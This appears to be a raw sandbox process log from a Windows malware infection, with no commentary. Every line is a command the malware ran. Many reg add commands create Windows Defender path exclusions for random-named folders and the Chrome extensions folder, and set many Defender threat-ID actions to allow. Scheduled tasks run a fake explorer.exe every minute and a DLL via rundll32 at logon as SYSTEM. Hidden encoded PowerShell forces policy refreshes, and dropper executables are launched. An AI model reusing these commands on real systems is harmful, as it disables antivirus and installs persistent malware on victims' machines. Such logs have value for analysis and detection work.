powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gkRYnlLeo" /SC once /ST 05:05:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gkRYnlLeo"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

\??\c:\windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gkRYnlLeo"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 04:55:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe\" aV /CBzEdidJp 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "yfARWRprRqUFWeTGf"

C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe

C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe aV /CBzEdidJp 385118 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe Wt /mYldiddIzO 385118 /S

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zgoZGMcaU\NWjkrv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHJXtPPPvDXVqpH" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

